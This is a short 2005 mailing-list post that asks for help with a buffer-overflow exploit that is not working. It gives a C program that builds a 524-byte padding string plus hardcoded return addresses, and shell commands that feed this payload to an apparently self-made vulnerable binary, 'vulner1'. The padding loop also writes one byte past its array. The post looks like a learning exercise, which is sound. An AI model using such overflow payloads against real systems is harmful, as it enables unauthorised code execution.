[Comm-en] System call via buffer overflow not working

Sat Jan 22 01:46:31 MSK 2005

Here are the typo fixes from my previous email:

//makehex.c
main() {
        char pad[524];
        int i;
        for (i=0; i < 524; i++)
                pad[i] = 'A';
        pad[524]='\0';

        printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
}

./vulner1 $(perl -e 'print "A"x524')$(printf

"\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
	or
./vulner1 $(./makehex)	 //don't forget to update and recompile makehex